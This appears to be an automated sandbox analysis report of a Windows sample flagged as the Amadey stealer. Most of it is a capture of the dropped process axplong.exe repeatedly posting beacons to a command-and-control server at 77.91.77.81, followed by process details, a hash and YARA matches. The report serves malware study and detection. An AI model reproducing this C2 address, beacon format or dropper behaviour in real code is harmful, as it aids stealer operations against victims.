                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  128192.168.2.44986777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:08.969862938 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:09.681708097 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  129192.168.2.44986877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:09.798860073 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:10.517594099 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  130192.168.2.44986977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:10.534929037 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:11.252722025 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  131192.168.2.44987077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:11.376405954 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:12.096815109 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  132192.168.2.44987177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:12.117258072 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:12.815177917 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  133192.168.2.44987277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:12.937061071 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:13.632560968 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  134192.168.2.44987377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:13.650718927 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:14.352919102 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  135192.168.2.44987477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:14.470936060 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:15.186064005 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  136192.168.2.44987577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:15.491894007 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:16.137949944 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  137192.168.2.44987677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:16.317440987 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:17.015717030 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  138192.168.2.44987777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:17.027944088 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:17.760529041 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  139192.168.2.44987877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:17.876060009 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:18.591965914 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  140192.168.2.44987977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:18.615530014 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:19.344676018 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  141192.168.2.44988077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:19.783449888 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:20.489322901 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  142192.168.2.44988177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:20.498621941 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:21.208684921 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  143192.168.2.44988277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:21.329201937 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  144192.168.2.44988377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:21.351535082 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:22.077610016 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  145192.168.2.44988477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:22.205101967 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:22.893599987 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  146192.168.2.44988577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:22.909430027 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:23.636791945 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  147192.168.2.44988677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:23.749670029 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:24.446239948 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  148192.168.2.44988777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:24.501204967 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:25.235282898 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  149192.168.2.44988877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:25.443507910 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:26.115308046 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:18:24:56
                  Start date:01/07/2024
                  Path:C:\Users\user\Desktop\setup.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\setup.exe"
                  Imagebase:0x360000
                  File size:1'942'016 bytes
                  MD5 hash:EAA443F37443CB7221D63E0891243384
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1661502263.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:18:25:00
                  Start date:01/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
